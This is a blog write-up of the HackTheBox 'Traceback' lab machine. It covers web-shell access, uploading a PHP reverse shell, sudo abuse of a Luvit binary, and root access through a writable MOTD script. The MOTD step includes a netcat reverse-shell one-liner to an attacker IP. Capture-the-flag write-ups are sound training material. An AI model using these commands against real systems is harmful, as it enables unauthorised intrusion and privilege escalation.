Open in app

Sign in

Write

Sign in

HackTheBox Writeup — Traceback

Jack Roberts
5 min readNov 26, 2020

--

Hack the Box is an online platform where you can practice your penetration testing skills. This is my write-up for the HackTheBox machine ‘Traceback’, which runs a Linux OS and is one of the ‘Easy’ rated machines.

1. Traceback Info Card.

1. Summary

The initial foothold on this box involves finding a hidden web-shell on an already compromised web-server and utilising this to upload our own PHP reverse shell to gain access as the ‘Webmin’ user. To escalate our privileges we exploit the fact that Webmin has Sysadmin privileges on a Luvit binary. Finally, to escalate to Root we modify one of the ‘Message of the Day’ files and exploit the fact that it always executes with Root privileges when anyone logs in via SSH.

2. Enumeration and Initial Foothold (Webmin)

2. Nmap Port Scan Results

The results show just two services running, SSH on port 22 and a web application running on port 80. I visited the web application and was presented with the page below.

3. Compromised Web Application on Port 80.

After inspecting the web page it was clear there was no functionality to interact with, however the HTML source code contains the following comment:

<!--Some of the best web shells that you might need ;) -->
4. HTML of Compromised Web Page.

This comment led me to do some OSINT gathering and led me to a popular Github repository that contained numerous PHP web-shells. The comment at the top of the repository matched the HTML source code comment exactly so I assumed I was on the right track. After appending http://10.10.10.181/smevk.php to the URL I was presented with the page below.

5. Compromised Web Application — Smevk Web-Shell Login Page.

I instantly tried admin:admin for the credentials as detailed in the Github repository and this was successful. I now had access to a web console that allowed me to upload PHP files, so I downloaded and modified a PHP reverse shell script from PenTestMonkey and uploaded this to the web console, which is named ‘JDR.php’.

6. Modified PHP Reverse Shell Script (JDR.php).
7. PHP-Reverse-Shell (JDR.php) Uploaded to Smevk Web Console.

Back on my Kali machine I opened up a netcat listener on port 9090 and issued the following curl command in another terminal window to make a HTTP GET request for the JDR.php file.

curl http://10.10.10.181/JDR.php

This allowed me to pop a reverse shell on the Traceback machine and gain an initial foothold as the ‘Webmin’ user.

8. Initial Foothold (Webmin) Shell.

3. User Shell — Sysadmin

After upgrading my shell, I ran a Linux enumeration script which returned three promising results.

  1. A strange ‘note.txt’ file within the Webmin home directory.
  2. Webmin has special permissions on a Luvit binary within the Sysadmin home directory.
  3. The Sysadmin home directory also contains a hidden SSH directory.
9. Contents of Note.txt and Webmin Special Permissions.

In short, the Luvit binary allows the execution of Lua scripts and since we have permission to run this with Sysadmin privileges, we can create a Lua script to insert our public RSA key into the Sysadmin’s hidden SSH directory.

10. Lua Script.

I then used a Python SimpleHTTPServer to host the Lua script temporarily and downloaded this to the Traceback machine using wget.

11. Downloading the Lua Script to Webmin’s home directory.

Now that the malicious Lua script is in the Webmin’s home directory, I used the command below to run the script with Sysadmin privileges.

sudo -u sysadmin /home/sysadmin/luvit

Returning back to my Kali machine I logged in as Sysadmin via SSH.

12. Sysadmin Shell and User.txt

4. Root

Continuing the privilege escalation, I inspected the processes running on the Traceback machine using pspy64. I noticed that there was a process running as root that copies the ‘Message of the Day’ (motd) files from the backups directory into the /etc/update-motd.d/ directory every 30 seconds.

13. Interesting Process from Pspy64.

Navigating into this directory we can see that the Sysadmin user has write permissions on these files, and after inspecting the contents of the 00-header file I noticed that this is the same content that is displayed to the terminal when logging in with SSH (see image 12).

14. Write Permissions on MOTD files and

This means that if we can modify this file to execute a reverse shell command back to our machine, when we login as Sysadmin via SSH this command will execute with root privileges and we will have a shell as root, however this needs to be done quickly before the running process overwrites our changes. The reverse shell command that worked for me is the one below, which needs to be appended to the end of the ‘00-header’ file.

rm /tmp/f1; mkfifo /tmp/f1; cat /tmp/f1 | /bin/sh -i 2>&1 | nc 10.10.17.13 8888 > /tmp/f1
15. Reverse-Shell Command within 00-header File.

Opening up a netcat listener on port 8888 on our Kali machine, quickly logging as sysadmin via SSH drops us into a root shell where we can retrieve the root flag.

16. Root Shell and root.txt

5. Conclusion

This was my fifth owned machine on HackTheBox and definitely one of my favourites, although I wasn’t too keen on the initial stage as it felt like guess work rather than working something out. Nevertheless I learnt something new every step of the way, including learning a little bit about Lua and the importance of checking running processes.

Keep an eye out for my future write-ups!

Hackthebox
Cybersecurity
Penetration Testing
Hacking
Information Security

--

--

Jack Roberts
Jack Roberts

Written by Jack Roberts

5 Followers
4 Following

MSc Cyber Security Student at Lancaster University. Mostly posting CTF writeups from HackTheBox, TryHackMe and VulnHub.

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams